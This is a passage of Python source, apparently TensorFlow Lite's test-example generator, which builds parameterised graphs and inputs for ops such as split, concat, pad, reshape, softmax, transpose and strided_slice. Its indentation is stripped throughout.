out = tf.nn.depthwise_conv2d(
input_tensor,
filter_input,
strides=parameters["strides"],
rate=parameters["rate"],
padding=parameters["padding"],
data_format=parameters["data_format"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input) or 2 tensors
# (input, filter) based on whether filter is constant or variable input.
input_shape, filter_shape = get_tensor_shapes(parameters)
values = [create_tensor_data(np.float32, input_shape)]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, filter_shape))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_split_tests(options):
"""Make a set of tests to do tf.split."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"num_or_size_splits": [1, 2, 3, 4, 5],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(
input_tensor, parameters["num_or_size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=112)
@register_make_test_function()
def make_splitv_tests(options):
"""Make a set of tests to do tf.split_v."""
test_parameters = [{
"input_shape": [[1, 3, 4, 6], [2, 4, 1], [6, 4], [8]],
"size_splits": [[2, 2], [1, 3], [4, 2], [5, 3],
[-1, 1], [-1, 2], [-1, 4]],
"axis": [0, 1, 2, 3, -4, -3, -2, -1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.split(input_tensor, parameters["size_splits"], parameters["axis"])
return [input_tensor], [out[0]]
def build_inputs(parameters, sess, inputs, outputs):
values = [create_tensor_data(np.float32, parameters["input_shape"])]
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=158)
@register_make_test_function()
def make_concat_tests(options):
"""Make a set of tests to do concatenation."""
test_parameters = [{
"base_shape": [[1, 3, 4, 3], [3, 4]],
"num_tensors": [1, 2, 3, 4, 5, 6],
"axis": [0, 1, 2, 3, -3, -2, -1],
"type": [tf.float32, tf.uint8, tf.int32, tf.int64],
}]
def get_shape(parameters, delta):
"""Return a tweaked version of 'base_shape'."""
axis = parameters["axis"]
shape = parameters["base_shape"][:]
if axis < 0:
axis += len(shape)
if axis < len(shape):
shape[axis] += delta
return shape
def build_graph(parameters):
all_tensors = []
for n in range(0, parameters["num_tensors"]):
input_tensor = tf.placeholder(dtype=parameters["type"],
name=("input%d" % n),
shape=get_shape(parameters, n))
all_tensors.append(input_tensor)
out = tf.concat(all_tensors, parameters["axis"])
return all_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
all_values = []
for n in range(0, parameters["num_tensors"]):
input_values = create_tensor_data(
parameters["type"], get_shape(parameters, n))
all_values.append(input_values)
return all_values, sess.run(
outputs, feed_dict=dict(zip(inputs, all_values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=60)
@register_make_test_function()
def make_fully_connected_tests(options):
"""Make a set of tests to do fully_connected."""
test_parameters = [{
"shape1": [[3, 3]],
"shape2": [[3, 3]],
"transpose_a": [True, False],
"transpose_b": [True, False],
"constant_filter": [True, False],
}, {
"shape1": [[4, 4], [1, 4], [4]],
"shape2": [[4, 4], [4, 1], [4]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[37, 40]],
"transpose_a": [False],
"transpose_b": [False],
"constant_filter": [True, False],
}, {
"shape1": [[40, 37]],
"shape2": [[40, 37]],
"transpose_a": [False],
"transpose_b": [True],
"constant_filter": [True, False],
}]
def build_graph(parameters):
"""Build a matmul graph given `parameters`."""
input_tensor1 = tf.placeholder(dtype=tf.float32, name="input1",
shape=parameters["shape1"])
# Get input_tensor2 either as a placeholder or constants. Also get a list of
# the input tensors that are represented as placeholders.
if parameters["constant_filter"]:
input_tensor2 = create_tensor_data(np.float32, parameters["shape2"])
input_tensors = [input_tensor1]
else:
input_tensor2 = tf.placeholder(
dtype=tf.float32, name="input2", shape=parameters["shape2"])
input_tensors = [input_tensor1, input_tensor2]
out = tf.matmul(input_tensor1, input_tensor2,
transpose_a=parameters["transpose_a"],
transpose_b=parameters["transpose_b"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
# Build list of input values either containing 1 tensor (input_values1) or 2
# tensors (input_values1, input_values2) based on whether the second input
# is a constant or variable input.
values = [create_tensor_data(np.float32, shape=parameters["shape1"])]
if not parameters["constant_filter"]:
values.append(create_tensor_data(np.float32, parameters["shape2"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=10)
@register_make_test_function()
def make_l2norm_tests(options):
"""Make a set of tests to do l2norm."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[5, 7], [1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3],
[3, 1, 2, 4, 6], [2, 2, 3, 4, 5, 6]],
"dim": [0, 1, 2, 3, [2, 3], -2],
"epsilon": [None, 1e-12, 1e-3],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
if parameters["epsilon"]:
out = tf.nn.l2_normalize(
input_tensor, parameters["dim"], epsilon=parameters["epsilon"])
else:
out = tf.nn.l2_normalize(input_tensor, parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_local_response_norm_tests(options):
"""Make a set of tests to do local_response_norm."""
  # Choose a set of parameters
test_parameters = [{
"input_shape": [[1, 1, 1, 1], [1, 3, 4, 3], [3, 15, 14, 3]],
"depth_radius": [None, 0, 1, 3, 5],
"bias": [None, 0.3, -0.1],
"alpha": [None, 2, -3],
"beta": [None, 0.25, 2],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=tf.float32, name="input", shape=parameters["input_shape"])
out = tf.nn.local_response_normalization(
input_tensor, depth_radius=parameters["depth_radius"],
bias=parameters["bias"], alpha=parameters["alpha"],
beta=parameters["beta"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(
np.float32, parameters["input_shape"], min_value=-4, max_value=10)
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_pad_tests(options):
"""Make a set of tests to do pad."""
# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[1, 2]]],
"constant_paddings": [False],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_padv2_tests(options):
"""Make a set of tests to do padv2."""
# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[0, 1]]],
"constant_paddings": [False],
"constant_values": [0, 2],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings,
constant_values=parameters["constant_values"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reshape_tests(options):
"""Make a set of tests to do reshape."""
# All shapes below are suitable for tensors with 420 elements.
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[3, 4, 5, 7], [4, 105], [21, 5, 2, 2], [420]],
"output_shape": [[15, 28], [420], [1, -1, 5, 7], [-1]],
"constant_shape": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1]],
"output_shape": [[]],
"constant_shape": [True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
# Get shape as either a placeholder or constants.
if parameters["constant_shape"]:
output_shape = parameters["output_shape"]
input_tensors = [input_tensor]
else:
# The shape of the shape tensor.
shape_tensor_shape = [len(parameters["output_shape"])]
output_shape = tf.placeholder(
dtype=tf.int32, name="output_shape", shape=shape_tensor_shape)
input_tensors = [input_tensor, output_shape]
out = tf.reshape(input_tensor, shape=output_shape)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_shape_tests(options):
"""Make a set of tests to do shape."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
"out_type": [tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the shape op testing graph."""
# Note that we intentionally leave out the shape from the input placeholder
# to prevent the Shape operation from being optimized out during conversion.
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.shape(input_value, out_type=parameters["out_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_rank_tests(options):
"""Make a set of tests to do rank."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
}]
def build_graph(parameters):
"""Build the rank op testing graph."""
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.rank(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_one_hot_tests(options):
"""Make a set of tests to do one_hot."""
test_parameters = [{
"indices_type": [tf.int32, tf.int64],
"indices_shape": [[3], [4, 4], [1, 5], [5, 1]],
"axis": [0, 1],
"dtype": [tf.int32, tf.int64, tf.float32],
"provide_optional_inputs": [True, False],
}]
def build_graph(parameters):
indices = tf.placeholder(
dtype=parameters["indices_type"],
name="indices",
shape=parameters["indices_shape"])
depth = tf.placeholder(dtype=tf.int32, name="depth", shape=())
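    # Without the optional inputs, tf.one_hot falls back to its defaults
    # (on_value=1, off_value=0, axis=-1).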
if not parameters["provide_optional_inputs"]:
out = tf.one_hot(indices=indices, depth=depth)
return [indices, depth], [out]
on_value = tf.placeholder(
dtype=parameters["dtype"], name="on_value", shape=())
off_value = tf.placeholder(
dtype=parameters["dtype"], name="off_value", shape=())
out = tf.one_hot(
indices=indices,
depth=depth,
on_value=on_value,
off_value=off_value,
axis=parameters["axis"],
dtype=parameters["dtype"])
return [indices, depth, on_value, off_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(
parameters["indices_type"],
shape=parameters["indices_shape"],
min_value=-1,
max_value=10),
create_tensor_data(tf.int32, shape=None, min_value=1, max_value=10),
]
if parameters["provide_optional_inputs"]:
input_values.append(
create_tensor_data(
parameters["dtype"], shape=None, min_value=1, max_value=10))
input_values.append(
create_tensor_data(
parameters["dtype"], shape=None, min_value=-1, max_value=0))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_bilinear_tests(options):
"""Make a set of tests to do resize_bilinear."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.image.resize_bilinear(input_tensor, size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_nearest_neighbor_tests(options):
"""Make a set of tests to do resize_nearest_neighbor."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.image.resize_nearest_neighbor(
input_tensor,
size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sigmoid_tests(options):
"""Make a set of tests to do sigmoid."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [4], [], [1, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.sigmoid(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_softmax_tests(options):
"""Make a set of tests to do softmax."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [2, 3]],
"dim": [-1, 0],
}, {
"dtype": [tf.float32],
"input_shape": [[4, 7]],
"dim": [-1, 1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.nn.softmax(input_tensor, dim=parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_depth_tests(options):
"""Make a set of tests to do space_to_depth."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.uint8, tf.int64],
"input_shape": [[2, 12, 24, 1]],
"block_size": [2, 3, 4],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.space_to_depth(input_tensor, block_size=parameters["block_size"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_batch_nd_tests(options):
"""Make a set of tests to do space_to_batch_nd."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2, 2, 3], [2, 2, 4, 1]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [0, 0]], [[0, 0], [2, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
{
"dtype": [tf.float32],
"input_shape": [[2, 3, 7, 3]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [2, 0]], [[1, 0], [1, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
      # Non-4D use case: 1 batch dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[1, 4, 4, 4, 1, 1]],
"block_shape": [[2, 2, 2]],
"paddings": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
]
def build_graph(parameters):
"""Build a space_to_batch graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get paddings either as a const or as a placeholder (tensor).
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="paddings", shape=shape)
input_tensors.append(paddings)
out = tf.space_to_batch_nd(input_tensor, block_shape, paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=56)
@register_make_test_function()
def make_batch_to_space_nd_tests(options):
"""Make a set of tests to do batch_to_space_nd."""
test_parameters = [
{
"dtype": [tf.float32, tf.int64, tf.int32],
"input_shape": [[12, 3, 3, 1]],
"block_shape": [[1, 4], [2, 2], [3, 4]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
      # Non-4D use case: 1 batch dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[8, 2, 2, 2, 1, 1]],
"block_shape": [[2, 2, 2]],
"crops": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
]
def build_graph(parameters):
"""Build a batch_to_space graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get crops either as a const or as a placeholder (tensor).
if parameters["constant_crops"]:
crops = parameters["crops"]
else:
shape = [len(parameters["crops"]), 2]
crops = tf.placeholder(dtype=tf.int32, name="crops", shape=shape)
input_tensors.append(crops)
out = tf.batch_to_space_nd(input_tensor, block_shape, crops)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_crops"]:
values.append(np.array(parameters["crops"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_transpose_tests(options):
"""Make a set of tests to do transpose."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[2, 2, 3]],
"perm": [[0, 1, 2], [0, 2, 1]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4]],
"perm": [[0, 1, 2, 3], [3, 0, 1, 2]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4, 5]],
"perm": [[4, 3, 2, 1, 0]],
"constant_perm": [True, False],
}]
def build_graph(parameters):
"""Build a transpose graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_perm"]:
perm = parameters["perm"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["perm"]), 2]
perm = tf.placeholder(dtype=tf.int32, name="perm", shape=shape)
input_tensors = [input_tensor, perm]
out = tf.transpose(input_tensor, perm=perm)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_perm"]:
values.append(np.array(parameters["perm"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_squeeze_tests(options):
"""Make a set of tests to do squeeze."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 2, 1, 3, 1, 4, 1, 1]],
"axis": [
None, [], [0, 2], [4, 7], [-1, 0, 2, 0, 7, -6], [1], [2, 3, 2],
[-1, -2, -4, -6, -8], [0, 2, 4, 6, 7], [7, 6, 4, 2, 0], [6, 6],
[0, 1, 2, 3, 4, 5, 6, 7], [-2, -3, 1, 0, 7, -5]
],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1]],
"axis": [None, [], [0], [-1]],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 1, 1, 1, 1]],
"axis": [None, [], [0], [3, 0], [-2, 0, 3, 2]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_squeeze_transpose_tests(options):
"""Make a set of tests to do squeeze followed by transpose."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 4, 10, 1]],
"axis": [[-1], [3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
out = tf.transpose(out, perm=[1, 2])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=0)
def _make_strided_slice_tests(options, test_parameters,
expected_tf_failures=0):
"""Utility function to make strided_slice_tests based on parameters."""
def build_graph(parameters):
"""Build graph for stride_slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_indices"]:
begin = parameters["begin"]
end = parameters["end"]
strides = parameters["strides"]
tensors = [input_tensor]
else:
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
end = tf.placeholder(
dtype=parameters["index_type"],
name="end",
shape=[len(parameters["input_shape"])])
strides = (
tf.placeholder(
dtype=parameters["index_type"],
name="strides",
shape=[len(parameters["input_shape"])])
if parameters["strides"] is not None else None)
tensors = [input_tensor, begin, end]
if strides is not None:
tensors.append(strides)
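    # Note: `shrink_axis_mask` appears in the parameter sets but is not
    # forwarded to tf.strided_slice here; only begin_mask and end_mask are
    # exercised.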
out = tf.strided_slice(
input_tensor,
begin,
end,
strides,
begin_mask=parameters["begin_mask"],
end_mask=parameters["end_mask"])
return tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build inputs for stride_slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
values = [input_values]
if not parameters["constant_indices"]:
begin_values = np.array(parameters["begin"]).astype(index_type)
end_values = np.array(parameters["end"]).astype(index_type)
stride_values = (
np.array(parameters["strides"]).astype(index_type)
if parameters["strides"] is not None else None)
values.append(begin_values)
values.append(end_values)
if stride_values is not None:
values.append(stride_values)
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
@register_make_test_function()
def make_strided_slice_tests(options):
"""Make a set of tests to do strided_slice."""
# TODO(soroosh): add test/support for uint8.
test_parameters = [
# 4-D (basic cases with const/non-const indices).
{
"dtype": [tf.float32, tf.int32, tf.int64],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin": [[0, 0, 0, 0]],
"end": [[12, 2, 2, 5]],
"begin_mask": [None],
"end_mask": [None],
"shrink_axis_mask": [None],
"constant_indices": [False, True],
},
# 4-D with non-trivial begin & end.
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"end": [[8, 2, 2, 3], [12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin_mask": [None, 8],
"end_mask": [None, 3],
"shrink_axis_mask": [None, 15, -1],
"constant_indices": [True],
},
      # Begin, end and strides have a smaller rank than the input shape.
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0]],
"end": [[1]],
"strides": [None, [1]],
"begin_mask": [0],
"end_mask": [0],
"shrink_axis_mask": [1],
"constant_indices": [True],
},
# 2-D
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, 0]],
"end": [[2, 2]],
"strides": [None, [2, 2]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False, True],
},
# Negative strides
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, -1]],
"end": [[2, -3]],
"strides": [[1, -1]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters, expected_tf_failures=2)
@register_make_test_function()
def make_strided_slice_1d_exhaustive_tests(options):
"""Make a set of exhaustive tests for 1D strided_slice."""
test_parameters = [
# 1-D Exhaustive
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[3]],
"begin": [[-2], [-1], [0], [1], [2]],
"end": [[-2], [-1], [0], [1], [2]],
